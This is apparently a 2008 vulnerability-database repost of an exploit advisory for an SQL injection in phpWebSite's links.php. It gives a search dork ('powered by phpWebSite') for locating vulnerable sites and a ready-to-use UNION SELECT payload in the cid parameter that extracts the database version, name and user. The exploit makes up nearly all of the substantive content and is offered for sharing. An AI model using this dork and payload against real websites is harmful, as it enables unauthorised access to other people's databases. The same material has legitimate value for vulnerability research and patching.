Security Advisory: phpWebSite links.php Sql Injection - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Aria-Security.com: Saba 2.0 Cross Site Scripting [PASSIVE]
  PHP-Nuke Module BookCatalog (category&cat
id) Remote SQL injection Vulnerability
  IranMC ( detail.php?Kala ) Remote SQL injection Vulnerability
  PHP-Nuke Module Sectionsnew (printpage&ar
tid) Remote SQL injection Vulnerability

From: beenudel1986_(at)_gmail.com <beenudel1986_(at)_gmail.com>
Date: 01.11.2008
Subject: phpWebSite links.php Sql Injection

################################################################
#
# Author: Beenu Arora
#
# Home : www.BeenuArora.com
#
# Email : beenudel1986@gmail.com
#
# Share the c0de!
#
################################################################
#
# Title: phpWebSite links.php Sql Injection

#
# Vendor: http://phpwebsite.appstate.edu/

#
#
###########################################################
#
# d0rk:powered by phpWebSite
#
###########################################################



    Live Demo:

http://localhost/links.
php?op=viewlink&cid=5+and+1=2+union+select+concat(version(),0x3a,
database(),0x3a,user())--



###########################################################
#
# Bug discovered : 30 Oct.2008
###########################################################
<< http://packetstormsecurity.org/0810-exploits/phpwebsitelink-sql.txt>>

test server